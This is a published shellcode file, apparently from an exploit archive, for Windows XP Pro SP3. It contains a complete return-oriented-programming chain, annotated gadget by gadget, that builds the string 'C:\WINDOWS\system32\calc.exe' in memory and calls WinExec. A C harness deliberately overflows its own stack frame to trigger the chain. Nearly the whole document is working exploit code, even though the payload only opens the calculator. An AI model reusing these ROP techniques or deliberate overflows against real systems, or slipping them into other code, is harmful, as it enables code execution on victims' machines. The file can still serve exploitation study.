# Title : Windows XP PRO SP3 - Full ROP calc shellcode
# Published : 2012-11-05
# Author : b33f (http://www.fuzzysecurity.com/)
/*
Shellcode: Windows XP PRO SP3 - Full ROP calc shellcode
Author: b33f (http://www.fuzzysecurity.com/)
Notes: This is probably not the most efficient way but
I gave the dll's a run for their money ;))
Greets: Donato, Jahmel
OS DLLs used -- every gadget address below is hard-wired to these exact builds and
load bases (XP has no ASLR); with any other version the chain lands on arbitrary code:
Base | Top | Size | Version (Important!)
___________|____________|____________|_____________________________
0x7c800000 | 0x7c8f6000 | 0x000f6000 | 5.1.2600.5781 [kernel32.dll]
0x7c900000 | 0x7c9b2000 | 0x000b2000 | 5.1.2600.6055 [ntdll.dll]
0x7e410000 | 0x7e4a1000 | 0x00091000 | 5.1.2600.5512 [USER32.dll]
UINT WINAPI WinExec(            => PTR to WinExec (0x7c862aed in this kernel32 build)
__in LPCSTR lpCmdLine,          => "C:\WINDOWS\system32\calc.exe" followed by a NUL dword (00000000)
__in UINT uCmdShow              => 0x1
);
*/
#include <iostream>
#include "windows.h"
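/*
 * ROP chain for XP SP3 with kernel32 5.1.2600.5781, ntdll 5.1.2600.6055 and USER32
 * 5.1.2600.5512 at their default bases. Laid out exactly as the stack sees it, one
 * dword per line (little-endian). The byte escapes had lost their backslashes in
 * transit ("xb1x4f..." was being compiled as 12-char ASCII strings); restored here.
 *
 * Stage 1 builds "C:\WINDOWS\system32\calc.exe" + NUL in a writable slot inside
 *         USER32 (ECX) with MOV [ECX+disp],reg gadgets. Only +0, +4, +8, +0xC and
 *         +0x14 are available, so ECX is bumped with INC to reach 0x10/0x18/0x1C and
 *         restored with DEC afterwards.
 * Stage 2 captures ESP (PUSH ESP ... POP EDI), moves it to EAX and adds 0x80 so EAX
 *         points at the tail of this very chain.
 * Stage 3 writes &WinExec, lpCmdLine and uCmdShow=1 into that tail; the final RETN
 *         lands on the freshly written &WinExec with a ready-made argument frame.
 *
 * "padding" dwords are eaten by the trailing POPs / RETN nn of the preceding gadget.
 * 0x7c87208a is also used as the return target after each RETN nn, so it is
 * evidently a plain RETN -- that makes the padding value a safe landing spot too.
 */
char shellcode[]=
"\xb1\x4f\x97\x7c" // POP ECX # RETN
"\xf9\x10\x47\x7e" // ECX = 0x7e4710f9, writable slot inside USER32.dll: the command string is built here
"\x27\xfa\x87\x7c" // POP EDX # POP EAX # RETN
"\x43\x3a\x5c\x57" // EDX = ASCII "C:\W"
"\x49\x4e\x44\x4f" // EAX = ASCII "INDO"
"\x04\x18\x80\x7c" // MOV DWORD PTR DS:[ECX],EDX # MOV DWORD PTR DS:[ECX+4],EAX # POP EBP # RETN 04   -> "C:\WINDO"
"\x8a\x20\x87\x7c" // padding: POP EBP
"\x8a\x20\x87\x7c" // padding: RETN target (plain RETN)
"\x8a\x20\x87\x7c" // padding: skipped by RETN 04
"\xe5\x02\x88\x7c" // POP EAX # RETN
"\x57\x53\x5c\x73" // EAX = ASCII "WS" + backslash (0x5c) + "s"
"\x38\xd6\x46\x7e" // MOV DWORD PTR DS:[ECX+8],EAX # POP ESI # POP EBP # RETN 08   -> "C:\WINDOWS\s"
"\x8a\x20\x87\x7c" // padding: POP ESI
"\x8a\x20\x87\x7c" // padding: POP EBP
"\x8a\x20\x87\x7c" // padding: RETN target (plain RETN)
"\x8a\x20\x87\x7c" // padding: skipped by RETN 08
"\x8a\x20\x87\x7c" // padding: skipped by RETN 08
"\xe5\x02\x88\x7c" // POP EAX # RETN
"\x79\x73\x74\x65" // EAX = ASCII "yste"
"\xcb\xbe\x45\x7e" // MOV DWORD PTR DS:[ECX+C],EAX # XOR EAX,EAX # INC EAX # POP ESI # POP EBP # RETN 08   -> "C:\WINDOWS\syste"
"\x8a\x20\x87\x7c" // padding: POP ESI
"\x8a\x20\x87\x7c" // padding: POP EBP
"\x8a\x20\x87\x7c" // padding: RETN target (plain RETN)
"\x8a\x20\x87\x7c" // padding: skipped by RETN 08
"\x8a\x20\x87\x7c" // padding: skipped by RETN 08
"\xe5\x02\x88\x7c" // POP EAX # RETN
"\x63\x61\x6c\x63" // EAX = ASCII "calc"
"\x31\xa9\x91\x7c" // MOV DWORD PTR DS:[ECX+14],EAX # MOV EAX,EDX # POP EBP # RETN 08   -> "calc" at +0x14; +0x10 is filled next (no [ECX+10] gadget)
"\x8a\x20\x87\x7c" // padding: POP EBP
"\x8a\x20\x87\x7c" // padding: RETN target (plain RETN)
"\x8a\x20\x87\x7c" // padding: skipped by RETN 08
"\x8a\x20\x87\x7c" // padding: skipped by RETN 08
"\x07\x3d\x96\x7c" // INC ECX # RETN   -- ECX += 4 so the +0xC / +0x14 gadgets now reach +0x10 / +0x18
"\x07\x3d\x96\x7c" // INC ECX # RETN
"\x07\x3d\x96\x7c" // INC ECX # RETN
"\x07\x3d\x96\x7c" // INC ECX # RETN
"\xe5\x02\x88\x7c" // POP EAX # RETN
"\x6d\x33\x32\x5c" // EAX = ASCII "m32" + backslash (0x5c)
"\xcb\xbe\x45\x7e" // MOV DWORD PTR DS:[ECX+C],EAX # XOR EAX,EAX # INC EAX # POP ESI # POP EBP # RETN 08   -> original +0x10: "C:\WINDOWS\system32\"
"\x8a\x20\x87\x7c" // padding: POP ESI
"\x8a\x20\x87\x7c" // padding: POP EBP
"\x8a\x20\x87\x7c" // padding: RETN target (plain RETN)
"\x8a\x20\x87\x7c" // padding: skipped by RETN 08
"\x8a\x20\x87\x7c" // padding: skipped by RETN 08
"\xe5\x02\x88\x7c" // POP EAX # RETN
"\x2e\x65\x78\x65" // EAX = ASCII ".exe"
"\x31\xa9\x91\x7c" // MOV DWORD PTR DS:[ECX+14],EAX # MOV EAX,EDX # POP EBP # RETN 08   -> original +0x18: ".exe"
"\x8a\x20\x87\x7c" // padding: POP EBP
"\x8a\x20\x87\x7c" // padding: RETN target (plain RETN)
"\x8a\x20\x87\x7c" // padding: skipped by RETN 08
"\x8a\x20\x87\x7c" // padding: skipped by RETN 08
"\x07\x3d\x96\x7c" // INC ECX # RETN   -- ECX += 4 again (original +8) so +0x14 reaches +0x1C
"\x07\x3d\x96\x7c" // INC ECX # RETN
"\x07\x3d\x96\x7c" // INC ECX # RETN
"\x07\x3d\x96\x7c" // INC ECX # RETN
"\x9e\x2e\x92\x7c" // XOR EAX,EAX # RETN   -- EAX = 0: the terminator dword
"\x31\xa9\x91\x7c" // MOV DWORD PTR DS:[ECX+14],EAX # MOV EAX,EDX # POP EBP # RETN 08   -> original +0x1C: NUL dword
"\x8a\x20\x87\x7c" // padding: POP EBP
"\x8a\x20\x87\x7c" // padding: RETN target (plain RETN)
"\x8a\x20\x87\x7c" // padding: skipped by RETN 08
"\x8a\x20\x87\x7c" // padding: skipped by RETN 08
"\xee\x4c\x97\x7c" // DEC ECX # RETN   -- ECX -= 8: back to the start of the string
"\xee\x4c\x97\x7c" // DEC ECX # RETN
"\xee\x4c\x97\x7c" // DEC ECX # RETN
"\xee\x4c\x97\x7c" // DEC ECX # RETN
"\xee\x4c\x97\x7c" // DEC ECX # RETN
"\xee\x4c\x97\x7c" // DEC ECX # RETN
"\xee\x4c\x97\x7c" // DEC ECX # RETN
"\xee\x4c\x97\x7c" // DEC ECX # RETN
//----------------------------------[ECX -> "C:\WINDOWS\system32\calc.exe" + NUL dword (28 chars)]-//
"\xe5\x02\x88\x7c" // POP EAX # RETN
"\x7a\xeb\xc3\x6f" // EAX = 0x6fc3eb7a, chosen so EAX+0x0CC4837C = 0x7c886ef6 falls inside kernel32 (0x7c800000-0x7c8f6000):
                   // the next gadget's stray ADC read-modify-writes one byte there instead of faulting, so that page
                   // must be writable (presumably kernel32's data section -- verify in a debugger)
"\x4f\xda\x85\x7c" // PUSH ESP # ADC BYTE PTR DS:[EAX+CC4837C],AL # XOR EAX,EAX # INC EAX # POP EDI # POP EBP # RETN 08
                   // PUSH ESP ... POP EDI leaves EDI = ESP as it was here (address of the padding dword below)
"\x8a\x20\x87\x7c" // padding: POP EBP
"\x8a\x20\x87\x7c" // padding: RETN target (plain RETN)
"\x8a\x20\x87\x7c" // padding: skipped by RETN 08
"\x8a\x20\x87\x7c" // padding: skipped by RETN 08
"\x32\xd9\x44\x7e" // XCHG EAX,EDI # RETN   -- EAX = saved ESP
"\x62\x28\x97\x7c" // ADD EAX,20 # POP EBP # RETN   -- 4 x 0x20: EAX = saved ESP + 0x80, i.e. 32 dwords further down this chain
"\x8a\x20\x87\x7c" // padding: POP EBP
"\x62\x28\x97\x7c" // ADD EAX,20 # POP EBP # RETN
"\x8a\x20\x87\x7c" // padding: POP EBP
"\x62\x28\x97\x7c" // ADD EAX,20 # POP EBP # RETN
"\x8a\x20\x87\x7c" // padding: POP EBP
"\x62\x28\x97\x7c" // ADD EAX,20 # POP EBP # RETN
"\x8a\x20\x87\x7c" // padding: POP EBP
//------------------------------------------[EAX = saved ESP + 0x80: base of the WinExec frame written below]-//
"\xd6\xd1\x95\x7c" // MOV DWORD PTR DS:[EAX+10],ECX # POP EBP # RETN 04   -- base+0x10 = ECX (lpCmdLine)
"\x8a\x20\x87\x7c" // padding: POP EBP
"\x8a\x20\x87\x7c" // padding: RETN target (plain RETN)
"\x8a\x20\x87\x7c" // padding: skipped by RETN 04
"\x33\x80\x97\x7c" // INC EAX # RETN   -- EAX = base+4
"\x33\x80\x97\x7c" // INC EAX # RETN
"\x33\x80\x97\x7c" // INC EAX # RETN
"\x33\x80\x97\x7c" // INC EAX # RETN
"\xf5\xd6\x91\x7c" // XOR ECX,ECX # RETN
"\x07\x3d\x96\x7c" // INC ECX # RETN   -- ECX = 1 (uCmdShow)
"\xd6\xd1\x95\x7c" // MOV DWORD PTR DS:[EAX+10],ECX # POP EBP # RETN 04   -- base+0x14 = 1 (uCmdShow)
"\x8a\x20\x87\x7c" // padding: POP EBP
"\x8a\x20\x87\x7c" // padding: RETN target (plain RETN)
"\x8a\x20\x87\x7c" // padding: skipped by RETN 04
"\xb1\x4f\x97\x7c" // POP ECX # RETN
"\xed\x2a\x86\x7c" // ECX = &WinExec (kernel32 5.1.2600.5781)
"\xe7\xc1\x87\x7c" // MOV DWORD PTR DS:[EAX+4],ECX # XOR EAX,EAX # POP EBP # RETN 04   -- base+8 = &WinExec; clearing EAX is harmless here
"\x8a\x20\x87\x7c" // padding: POP EBP
"\x8a\x20\x87\x7c" // padding: RETN target (plain RETN), which then returns into the slot below
"\x8a\x20\x87\x7c" // padding: skipped by RETN 04
"\x8a\x20\x87\x7c" // base+8 by the chain's own arithmetic: overwritten with &WinExec above, so the RETN lands in WinExec
"\x8a\x20\x87\x7c"; // base+0xC: WinExec's return address (plain RETN). lpCmdLine/uCmdShow sit in the two stack dwords
                    // just past this array, written at run time by the two [EAX+10] stores. No clean exit after calc spawns.
//----------------------------------------------------[Write arguments and execute -> WinExec("...calc.exe", 1)]-//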
/*
 * Self-overflow harness: copies the ROP chain over buff()'s own stack frame so that
 * the saved return address is replaced by the first gadget and the dwords above it
 * by the rest of the chain. The "+5" from &a is tied to the exact frame layout
 * Dev-C++ 4.9 emits for this function (one char local, no reordering, no cookie);
 * any other compiler or optimisation level puts the return address elsewhere and
 * the chain simply is not executed. Writing 400+ bytes past a single char is
 * undefined behaviour by design -- this is the trigger, not a bug to fix.
 * Note: memcpy is only reached through <iostream>/windows.h here; <cstring> would
 * make the dependency explicit.
 */
void buff() {
char a;
memcpy((&a)+5, shellcode, sizeof(shellcode)); // Compiler dependent, works with Dev-C++ 4.9
}
/*
 * Entry point. USER32.dll must be mapped at its expected base (0x7e410000) because
 * the chain stores the command string into it and takes gadgets from it; a console
 * program does not load USER32 on its own, hence the explicit LoadLibrary.
 * `buf` is never read -- presumably it only enlarges main()'s frame so the overflow
 * in buff() spills into scratch space rather than anything main still needs (as
 * layout-dependent as buff() itself; removing it may change where the chain lands).
 * Once the chain runs there is no clean path back here: expect calc to appear and
 * the process to crash afterwards.
 */
int main()
{
LoadLibrary("USER32.dll"); // we need this dll
char buf[1024];
buff();
return 0;
}